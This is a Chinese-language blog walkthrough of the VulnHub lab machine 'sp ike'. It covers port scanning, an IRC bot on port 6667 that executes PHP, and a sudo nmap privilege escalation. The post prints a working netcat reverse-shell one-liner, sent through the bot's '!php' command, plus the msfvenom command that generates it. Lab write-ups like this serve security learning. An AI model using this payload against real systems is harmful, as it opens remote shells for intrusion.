vulnhub sp ike

已于 2022-02-10 15:11:37 修改
阅读量1k 收藏
点赞数
分类专栏: 靶机渗透 web 文章标签: 渗透测试 kali linux web安全
于 2022-02-10 15:10:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/122858435
版权

这次的靶机总体不难,但是有些新东西需要学习下。

nmap扫描靶机端口

这里进入80端口

 发现是apache的默认页面,gobuster与dirb扫描目录也没什么信息,浏览器访问其他端口也没结果。

这里看了其他大佬的博客,发现6667端口的irc是个线索,irc简而言之就是聊天的服务器,这里常用的客户端就是hexchat,首先kali安装hexchat

sudo apt install hexchat

这里如果用的apt-get安装可能会出现错误

安装完成之后,打开

 添加一个ike的网络服务器

注意这里要把使用ssl关闭,否则后面会出现错误,然后连接 

 这里注意第一次登录会显示phpbot已被占用,正在使用test1重试。然后才能进行下面的操作,否则需要重启虚拟机,再次进入频道。如果正确的话,右边的管理员列表如图

下面的信息就是在说#php频道是主要的频道,而且下面有执行php代码的提示。

进入php频道,然后输入下面的php代码

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 10.0.2.4 6666 0</tmp/tsglu | /bin/sh >/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

更改ip和端口,proc_open里面的内容就是netcat的反弹shell,使用下面的代码生成

msfvenom -p cmd/unix/reverse_netcat lhost=10.0.2.4 lport=6666 R

这里不能理解为什么用这段代码,我用了其他的php反弹shell都不能成功,如有大佬知道,希望大佬能解答一下。

如果上述都完成,那么可以得到ike的shell

直接在gtfobins里搜索nmap的sudo方式提权的方法 

 这里直接用第一个即可

送给自己的一段话:很多次都感觉自己像个菜鸟,这不会,那不会。但我想,没有谁是全知全能的,慢慢学习,慢慢积累,有进步就是好事。

mrwangtw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IKE与IPSec详解
悦分享
08-11 4251
定义: 安全联盟是要建立IPSec 隧道的通信双方对隧道参数的约定,包括隧道两端的IP地址、隧道采用的验证方式、验证算法、验证密钥、加密算法、共享密钥以及生命周期等一系列参数。SA由三元组来唯一标识,这个三元组包括安全参数索引SPI(Security Parameter Index)、目的IP地址和使用的安全协议号(AH或ESP)。其中,SPI是为唯一标识SA而生成的一个32位比特的数值,它在AH和ESP头中传输。在手工配置SA时,需要手工指定SPI的取值。使用IKE协商产生SA时,SPI将随机生成。...
IPSec及IKE原理
11-14
本课程主要介绍IPSec技术。IPSec(IP Security)是IETF制定的为...IKE(Internet Key Exchange)为IPSec提供了自动协商交换密钥、建立安全联盟的服务, 能够简化IPSec的使用和管理,大大简化IPSec的配置和维护工作。
vulnhub sp eric
mrwangtw的博客
02-09 549
扫描主机和端口 靶机IP:10.0.2.47 开放端口22和80 kali IP:10.0.2.4 这里一开始是看看能不能用匿名方式登录ssh,发现不可行 进入80端口 查看源代码,也没发现什么可用的信息,gobuster扫描 进入index,发现就是第一张图的内容 进入admin,也没发现什么可用的信息 使用drib再次扫描80端口 dirb http://10.0.2.47 发现有个.git的目录,使用githack下载源代码 python2 GitHack..
Vulnhub系列】Acid
大方子
11-28 1452
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
Vulnhub系列】Mr.root
大方子
12-05 2905
靶机下载地址:https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent 这次靶机的名称是Mr.root kali:192.168.100.8 Win7:192.168.100.9 ==============================================================================...
IKE Scan
HideInTime的博客
07-11 1449
IKE协议是IPSec的一部分,网络层数据加密传输,常用的VPN隧道通信或者传输通信技术 kaliike scan :vpn安全检测 IPSec相关攻击: 当谈论VPN技术时,人们通常会自动认为它是基于IPSec的。这在某种程度上是真的,因为基于IPSec的VPN为旁路流量提供了最高等级的保护,而且发现和报告的漏洞数量最少。 当查找支持IPSec的设备时,你要寻找主机上开放的UDP 50...
IPsec之IKE协商过程详解
Sallyyym的博客
01-20 8875
ipsec之IKE协商过程详解 IKE第一阶段 IKE的精髓在于它永远不在不安全的网络上直接传送密钥,而是通过一系列的计算,双方最终计算出共享密钥,并且即使第三方截获了交换中的所有数据,也无法计算出真正的密钥。其中的核心技术就是DH交换算法。 IKE协商第一阶段,参与通信的双方会生成4个秘密: SKEYID:后续三个都建立在它的基础上,由它推算出。 SKEYID_d:用于为ipsec衍生出加密的材料。 SKEYID_a:用来为IKE消息保障数据的完整性以及对数据源的身份进行验证。 SKEYID_e:为后续的
IKE协议的重要功能有哪些?
mengmeng_921的博客
04-09 2638
IKE协议的重要功能有哪些?对于网络工程师们来说,协议一定是不陌生的,今天要来给大家介绍的是IKE协议,也就是因特网密钥交换协议。 ​ IKE协议是什么? IKE协议是一份符合因特网协议安全(IPSec)标准的协议。因特网密钥交换协议是结合了两个早期的安全协议而生成的综合性协议。它们分别是:Oakley协议和SKEME协议。因特网密钥交换协议(IKE)是基于因特网安全连接和密钥管理协议ISAKMP(Internet Security Association and Key Management Protoc
IKE协商
zljszn的博客
10-26 2638
身份认证信息包括第一阶段计算出的密钥和第二阶段产生的密钥材料等,可以再次认证对等体。3. 消息⑤和⑥用于身份和认证信息交换(双方使用生成的密钥发送信息),双方进行身份认证(预共享密钥方式下为。如果没有匹配的安全提议,响应方将拒绝发起方的安全提议。IKE安全提议,并且消息②中还包括响应方发送身份信息供发起方认证,消息③用于响应方认证发起方。利用第一阶段已通过认证和安全保护的安全通道,目的是建立一对用于数据安全传输的。安全参数包括被保护的数据流和。协商响应方发送确认的安全参数和身份认证信息并生成新的密钥。
linux c ike协议,IPSEC中IKE协议在LINUX上的实现和研究
weixin_39922004的博客
05-15 107
摘要:论文主要研究了IPSEC协议族中,用于建立安全联盟和密钥管理的协议——IKE协议(Internet Key Exchange protocol)的详细内容,实现细节,以及协议本身的优缺点,同时对IKE协议中的积极模式进行实现,并对积极模式的缺点进行改进和有益的探讨. 首先介绍了IPSEC协议.它是针对TCP/IP协议族中缺乏安全保证而开发的,通过在IP层实现来解决安全问题.IPSEC可以分成...
ipsec 及IKE原理
04-06
ipsec IKE PKI 防火墙 linux
RFC for IKE
07-10
RFC for IKE, IKE is becoming more and more important for IPSec, PKI, etc.
网络安全课程3 - IPsec与IKE技术详解.pdf
11-04
IKE .......................................................................................................................................................... 6 IKE简介..................................
NIST SP800-135 rev1.pdf
02-25
Internet Key Exchange (IKE) (version 1: RFC 2409 [RFC 2409] and version 2: RFC 4306 [RFC 4306]),  Secure Shell (SSH): RFC 4251 [RFC 4251],  Transport Layer Security (TLS) version 1.0: RFC 2246...
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 703
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 416
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 227
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 509
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
display ike sa
03-19
IKE(Internet Key Exchange)是一种用于建立和管理IPsec(Internet Protocol******IPsec连接所需的安全参数,包括加密算法、认证算法、密钥长度等。IKE SA的建立是通过IKE协议的两个阶段来完成的。 在第一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值